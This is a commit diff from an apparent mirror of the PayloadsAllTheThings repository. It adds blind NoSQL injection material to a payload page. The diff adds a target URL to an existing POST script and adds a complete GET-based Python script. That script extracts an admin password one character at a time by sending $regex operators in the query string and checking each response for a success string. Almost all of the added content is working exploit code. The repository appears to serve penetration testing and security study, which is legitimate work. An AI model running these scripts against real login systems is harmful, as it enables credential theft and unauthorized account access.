mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
commit
aac5a57932
1 changed files with 27 additions and 0 deletions
|
@ -50,6 +50,9 @@ Extract data with "in"
|
|||
|
||||
## Blind NoSQL
|
||||
|
||||
### POST with JSON body
|
||||
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
|
@ -59,6 +62,7 @@ urllib3.disable_warnings()
|
|||
|
||||
username="admin"
|
||||
password=""
|
||||
u="http://example.org/login"
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
|
@ -70,6 +74,29 @@ while True:
|
|||
password += c
|
||||
```
|
||||
|
||||
### GET
|
||||
|
||||
```python
|
||||
import requests
|
||||
import urllib3
|
||||
import string
|
||||
import urllib
|
||||
urllib3.disable_warnings()
|
||||
|
||||
username='admin'
|
||||
password=''
|
||||
u='http://example.org/login'
|
||||
|
||||
while True:
|
||||
for c in string.printable:
|
||||
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
||||
r = requests.get(u + payload)
|
||||
if 'Yeah' in r.text:
|
||||
print("Found one more char : %s" % (password+c))
|
||||
password += c
|
||||
```
|
||||
|
||||
## MongoDB Payloads
|
||||
|
||||
```bash
|
||||
|
|